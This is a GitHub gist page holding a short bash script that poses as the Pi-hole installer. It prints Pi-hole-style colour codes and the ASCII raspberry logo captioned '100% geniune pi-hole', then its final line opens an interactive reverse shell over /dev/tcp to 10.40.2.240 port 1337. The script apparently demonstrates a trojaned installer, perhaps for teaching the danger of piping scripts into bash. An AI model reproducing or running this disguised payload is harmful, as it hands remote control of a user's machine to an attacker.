Created
February 5, 2020 11:17
-
-
Save mattfoster/7b29587f6f56f01fd5657f93615b7496 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#! /bin/bash | |
COL_NC='\e[0m' # No Color | |
COL_LIGHT_GREEN='\e[1;32m' | |
COL_LIGHT_RED='\e[1;31m' | |
TICK="[${COL_LIGHT_GREEN}✓${COL_NC}]" | |
CROSS="[${COL_LIGHT_RED}✗${COL_NC}]" | |
INFO="[i]" | |
# shellcheck disable=SC2034 | |
DONE="${COL_LIGHT_GREEN} done!${COL_NC}" | |
OVER="\\r\\033[K" | |
show_ascii_berry() { | |
echo -e " | |
${COL_LIGHT_GREEN}.;;,. | |
.ccccc:,. | |
:cccclll:. ..,, | |
:ccccclll. ;ooodc | |
'ccll:;ll .oooodc | |
.;cll.;;looo:. | |
${COL_LIGHT_RED}.. ','. | |
.',,,,,,'. | |
.',,,,,,,,,,. | |
.',,,,,,,,,,,,.... | |
....''',,,,,,,'....... | |
......... .... ......... | |
.......... .......... | |
.......... .......... | |
......... .... ......... | |
........,,,,,,,'...... | |
....',,,,,,,,,,,,. | |
.',,,,,,,,,'. | |
.',,,,,,'. | |
..'''.${COL_NC} | |
100% geniune pi-hole | |
" | |
} | |
show_ascii_berry | |
bash -i >& /dev/tcp/10.40.2.240/1337 0>&1 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment